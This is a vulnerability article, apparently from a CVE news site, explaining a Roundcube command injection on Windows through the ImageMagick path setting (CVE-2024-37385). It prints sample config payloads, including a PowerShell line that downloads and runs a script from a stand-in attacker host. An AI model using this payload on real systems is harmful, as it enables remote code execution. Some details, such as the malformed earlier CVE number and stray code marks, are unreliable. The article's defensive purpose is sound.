CVE CyberSecurity Database News

CVE-2024-37385 - How a Missed Patch in Roundcube Webmail Led to RCE on Windows (with Code and Exploit Demo)

Poster -

Roundcube is a hugely popular open-source webmail client used by thousands of organizations. But security nightmares repeat, and sometimes old problems come back in new ways. One such case is CVE-2024-37385, a command injection vulnerability in Roundcube for Windows that landed because an earlier patch (CVE-202-12641) wasn't thorough enough.

This long-read explains what went wrong, shows you sample code, links the best references, and gives a simple exploit demo—all focused on helping admins and curious readers secure their Roundcube instances.

On Windows servers only

The core problem is command injection via im_convert_path and im_identify_path. These are configuration fields for the paths to the ImageMagick “convert” and “identify” tools, used for generating image thumbnails.

Incomplete Fix for Old CVE

This new CVE appeared because the patch for CVE-202-12641 didn’t cover all Windows command quirks. Attackers can now trick Roundcube into running arbitrary system commands if they can edit these config fields, or otherwise control settings.

Attack Pre-Condition

- Attacker can set im_convert_path or im_identify_path in config/config.inc.php, or possibly via admin panel or a writable config.

(Usual: attackers get this chance post-lateral movement or via weak admin creds.)

If the attacker controls that field, they *can* run any Windows command with the web server’s privileges.

Example: Malicious Path in Config

// config/config.inc.php
$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C calc.exe';

Above, Roundcube will try to use "convert" but instead, it launches the Windows calculator.

Why does it work?
Windows will execute whatever is set in that field, including arguments. If you add extra commands after cmd.exe /C, it will run them.

Imagine the attacker wants a reverse shell

$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString(\'http://evil.example.com/shell.ps1\';)"';

- The next time a user uploads a picture (or triggers an image conversion), that PowerShell script runs.

In the vulnerable Roundcube versions, code to handle image conversion might look like this

function image_convert($input, $output) {
    global $RCMAIL;
    $cmd = $RCMAIL->config->get('im_convert_path') . " " . escapeshellarg($input) . " " . escapeshellarg($output);
    exec($cmd, $output, $return_var);
}

On Windows, the escapeshellarg doesn't neutralize arguments.

- If the config value (im_convert_path) contains things like cmd.exe /c, exec() runs them as-is.

This issue didn’t appear on *nix as the patch for Linux shells worked. On Windows, shell behavior is different, hence the incomplete fix.

`php

$config['im_convert_path'] = 'C:\\Windows\\System32\\cmd.exe /C notepad.exe';

Patching and Prevention

Solution:
Update to 1.5.7 or 1.6.7.

References and Further Reading

- Roundcube Security Announcement (CVE-2024-37385)
- CVE-2024-37385 at Mitre
- Previous CVE-202-12641
- Roundcube GitHub
- Escaping Shell Commands in PHP

Final Thoughts

This case should remind every sysadmin: Security patches aren't just about putting out today’s fire. On Windows, shell quirks create easy, dangerous paths for attackers—especially with tools like webmail running with significant access. Review security advisories, and always treat configuration paths as untrusted input.

Upgrade now.
If you need more technical details or want exploits/scripts, check the links above or ask in forums dedicated to infosec.

Timeline

Published on: 06/07/2024 04:15:30 UTC
Last modified on: 08/01/2024 13:53:32 UTC